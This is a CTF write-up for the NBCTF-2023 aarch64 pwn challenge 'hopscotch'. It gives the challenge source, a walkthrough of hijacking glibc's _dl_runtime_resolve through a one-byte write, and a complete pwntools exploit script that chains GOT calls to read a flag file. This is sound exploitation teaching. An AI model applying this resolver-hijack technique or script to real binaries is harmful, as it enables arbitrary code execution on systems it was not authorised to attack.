ʕ·ᴥ·ʔ






hopscotch

12/03/2023

By: unvariant

Tags: pwn NBCTF-2023

Problem Description:

Hints:

Reveal Hints maybe you should take a closer look how functions are resolved...

The source for the challenge is fairly simple:

#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <stdlib.h>
#include <fcntl.h>
#include <stdint.h>

#define BUFSZ 0x4000

int bad_pwner_returning_to_main = 0;

__attribute__((section(".plt"), leaf))
void filler() {
    asm volatile(
        ".rept  0x10000 / 4\n"
        "nop\n"
        ".endr\n"
        "udf #0\n"
    );
}

int main(int argc, char **argv) {
    char *address, *old, *new;
    int fd;
    int status;
    char buf[BUFSZ];

    if (bad_pwner_returning_to_main > 0) {
        asm volatile("udf #0");
    }
    bad_pwner_returning_to_main++;

    setbuf(stdout, NULL);
    setbuf(stdin, NULL);

    fd = open("/proc/self/maps", O_RDONLY);
    read(fd, buf, BUFSZ);

    old = buf;
    while ((new = strchr(old, '\n'))) {
        *new = 0;
        if (strstr(old, "run")) {
            puts(old);
        }
        old = new + 1;
    }

    puts("exit status >");
    read(0, buf, BUFSZ);
    status = strtol(buf, NULL, 16);

    puts("address >");
    read(0, buf, BUFSZ);
    address = (char *)strtol(buf, NULL, 16);

    puts("character >");
    read(0, buf, BUFSZ);
    *address = buf[0];
    
    printf("exiting with status: %d\n", status);
    exit(status);
}

Buffering is disabled and it leaks the address of the binary via /proc/self/maps. Also as the challenge description eludes to, it allows a single byte write to an address of the users choice. There is no buffer overflow or other vulnerability, just a leak, one byte write, and stack control.

For this challenge I wanted to attack the _dl_runtime_resolve function that the linker uses to resolve GOT entries during runtime. If the binary protection is set to Partial RELRO or No Relro a function pointer to _dl_runtime_resolve is present in the binary. However it is only writeable with No Relro.

First lets take a look at the function resolution chain: When printf is called it first calls the corresponding PLT entry for that function, which looks it up in the GOT table and branches to it. hopscotch-thunk

If the function has not been resolved yet the GOT table will point to this function: hopsotch-plt-resolver

It saves the return address (x30) and the pointer to the GOT entry (x16) on the stack, and then loads x16 with a pointer to link_map and calls _dl_runtime_resolve. The source for the aarch64 _dl_runtime_resolve is located at sysdeps/aarch64/dl-trampoline.S in the glibc source:


	.text
	.globl _dl_runtime_resolve
	.type _dl_runtime_resolve, #function
	cfi_startproc
	.align 2
_dl_runtime_resolve:
	BTI_C
	/* AArch64 we get called with:
	   ip0		&PLTGOT[2]
	   ip1		temp(dl resolver entry point)
	   [sp, #8]	lr
	   [sp, #0]	&PLTGOT[n]
	 */

	cfi_rel_offset (lr, 8)

	/* Note: Saving x9 is not required by the ABI but the assembler requires
	   the immediate values of operand 3 to be a multiple of 16 */
	stp	x8, x9, [sp, #-(80+8*16)]!
	cfi_adjust_cfa_offset (80+8*16)
	cfi_rel_offset (x8, 0)
	cfi_rel_offset (x9, 8)

	stp	x6, x7, [sp,  #16]
	cfi_rel_offset (x6, 16)
	cfi_rel_offset (x7, 24)

	stp	x4, x5, [sp,  #32]
	cfi_rel_offset (x4, 32)
	cfi_rel_offset (x5, 40)

	stp	x2, x3, [sp,  #48]
	cfi_rel_offset (x2, 48)
	cfi_rel_offset (x3, 56)

	stp	x0, x1, [sp,  #64]
	cfi_rel_offset (x0, 64)
	cfi_rel_offset (x1, 72)

	stp	q0, q1, [sp, #(80+0*16)]
	cfi_rel_offset (q0, 80+0*16)
	cfi_rel_offset (q1, 80+1*16)

	stp	q2, q3, [sp, #(80+2*16)]
	cfi_rel_offset (q0, 80+2*16)
	cfi_rel_offset (q1, 80+3*16)

	stp	q4, q5, [sp, #(80+4*16)]
	cfi_rel_offset (q0, 80+4*16)
	cfi_rel_offset (q1, 80+5*16)

	stp	q6, q7, [sp, #(80+6*16)]
	cfi_rel_offset (q0, 80+6*16)
	cfi_rel_offset (q1, 80+7*16)

	/* Get pointer to linker struct.  */
	ldr	PTR_REG (0), [ip0, #-PTR_SIZE]

	/* Prepare to call _dl_fixup().  */
	ldr	x1, [sp, 80+8*16]	/* Recover &PLTGOT[n] */

	sub     x1, x1, ip0
	add     x1, x1, x1, lsl #1
	lsl     x1, x1, #3
	sub     x1, x1, #(RELA_SIZE<<3)
	lsr     x1, x1, #3

	/* Call fixup routine.  */
	bl	_dl_fixup

	/* Save the return.  */
	mov	ip0, x0

	/* Get arguments and return address back.  */
	ldp	q0, q1, [sp, #(80+0*16)]
	ldp	q2, q3, [sp, #(80+2*16)]
	ldp	q4, q5, [sp, #(80+4*16)]
	ldp	q6, q7, [sp, #(80+6*16)]
	ldp	x0, x1, [sp, #64]
	ldp	x2, x3, [sp, #48]
	ldp	x4, x5, [sp, #32]
	ldp	x6, x7, [sp, #16]
	ldp	x8, x9, [sp], #(80+8*16)
	cfi_adjust_cfa_offset (-(80+8*16))

	ldp	ip1, lr, [sp], #16
	cfi_adjust_cfa_offset (-16)

	/* Jump to the newly found address.  */
	br	ip0

	cfi_endproc
	.size _dl_runtime_resolve, .-_dl_runtime_resolve

The resolver saves all the registers, loads link_map from x16 and the relocation index from the stack, and calls _dl_fixup to locate the real address of the function. Afterwards it restores all the registers and calls the resolved function.

Since we have single byte arb write in the binary, so we can modify the lsb of the _dl_runtime_resolve pointer and jump into the middle of the function instead of the start. This gives us control inside the function because if we skip the prologue where it saves the registers, we control the GOT index and the values of all the registers when it restores from the stack, since we control whatever is on the stack from the previous reads. We control the function it resolves, all of the functions arguments, and the return address of the function which allows us to call any function from the GOT with full argument control.

For example if we set the lsb so it starts here:

	/* Get pointer to linker struct.  */
	ldr	PTR_REG (0), [ip0, #-PTR_SIZE]

	/* Prepare to call _dl_fixup().  */
	ldr	x1, [sp, 80+8*16]	/* Recover &PLTGOT[n] */

	sub     x1, x1, ip0
	add     x1, x1, x1, lsl #1
	lsl     x1, x1, #3
	sub     x1, x1, #(RELA_SIZE<<3)
	lsr     x1, x1, #3

_dl_runtime_resolve will load link_map from x16 and the GOT index from the stack. We control the GOT index so we can redirect it to any function in the GOT.

	/* Call fixup routine.  */
	bl	_dl_fixup

	/* Save the return.  */
	mov	ip0, x0

	/* Get arguments and return address back.  */
	ldp	q0, q1, [sp, #(80+0*16)]
	ldp	q2, q3, [sp, #(80+2*16)]
	ldp	q4, q5, [sp, #(80+4*16)]
	ldp	q6, q7, [sp, #(80+6*16)]
	ldp	x0, x1, [sp, #64]
	ldp	x2, x3, [sp, #48]
	ldp	x4, x5, [sp, #32]
	ldp	x6, x7, [sp, #16]
	ldp	x8, x9, [sp], #(80+8*16)
	cfi_adjust_cfa_offset (-(80+8*16))

	ldp	ip1, lr, [sp], #16
	cfi_adjust_cfa_offset (-16)

	/* Jump to the newly found address.  */
	br	ip0

_dl_fixup is called to resolve the function and the address is stashed in x16. All the clobbered registers are restored from the stack, along with the return address and the resolved function is called. We set the return address to the PLT resolver again so when the resolved function returns we can trigger this again to call another arbitrary function from the GOT.

The GOT table for this challenge holds open, read, and write so we can leverage them to open flag.txt and read it. If only read is available this attack still works, you just have to set up the proper ret2dlresolve structures in the .bss section first so you can call arbitrary libc functions.

small red herring

Some competitors were looking at this specific part of the resolver:

	/* Save the return.  */
	mov	ip0, x0

	/* Get arguments and return address back.  */
	ldp	q0, q1, [sp, #(80+0*16)]
	ldp	q2, q3, [sp, #(80+2*16)]
	ldp	q4, q5, [sp, #(80+4*16)]
	ldp	q6, q7, [sp, #(80+6*16)]
	ldp	x0, x1, [sp, #64]
	ldp	x2, x3, [sp, #48]
	ldp	x4, x5, [sp, #32]
	ldp	x6, x7, [sp, #16]
	ldp	x8, x9, [sp], #(80+8*16)
	cfi_adjust_cfa_offset (-(80+8*16))

	ldp	ip1, lr, [sp], #16
	cfi_adjust_cfa_offset (-16)

	/* Jump to the newly found address.  */
	br	ip0

If you control x0 you can call an arbitrary function as long as you know the address of it beforehand, with full argument control. The one function in the challenge where you do have control over x0 is exit, but its not exploitable for two reasons. First exit accepts a 32 bit int and the binary is always mapped somewhere above the 32 bit address space, and there is a unresolved printf call before the exit where x0 is not controlled which would crash the program before reaching exit.

full solve script

from pwn import *
from time import sleep

context.clear(arch="arm64")
context.terminal = ["kitty"]

file = ELF("./runner")

env = {}
if args.GDB:
    env["QEMU_GDB"] = "1337"
if args.HOST and args.PORT:
    p = remote(args.HOST, args.PORT)
else:
    p = process(["qemu-aarch64", "-strace", "-D", "qemu.log", "-singlestep", "./run"], env=env)

filebase = int(p.recvline().decode().split("-")[0], 16)
resolver = file.get_section_by_name(".got.plt").header.sh_addr + 0x10
overwrite = 0xac
trampoline = file.get_section_by_name(".plt").header.sh_addr + 4

log.info(f"filebase @ {filebase:#x}")
log.info(f"resolver @ {resolver:#x}")

p.sendlineafter(b">", b"0")
p.sendlineafter(b">", f"{filebase + resolver:#x}".encode())

def call(func: str, *args):
    stuff: dict[int, int] = {
        0xd0: filebase + file.got[func],
        0xd8: filebase + trampoline,
    }
    for i in range(len(args)):
        start = 0x40 - (i // 2) * 0x10
        stuff[start + (i % 2) * 8] = args[i]
    return fit(stuff)

# this first part of the payload is unnecessary, you can redirect to read immediately without going through printf
# but i was too lazy to recalculate all the offsets
payload = fit({
    0x00: overwrite,
    0x08: filebase + file.got.printf,
    0x98: filebase + file.got.printf,
    0xa0: filebase + trampoline,
})
payload += call("read", 0, filebase + file.bss(), 0x100)
payload += call("open", filebase + file.bss(), 0)
payload += call("read", 4, filebase + file.bss(), 0x100)
payload += call("puts", filebase + file.bss())
payload += call("exit", 13)
p.sendlineafter(b">", payload)

sleep(1)

p.sendline(b"flag.txt\x00")

p.interactive()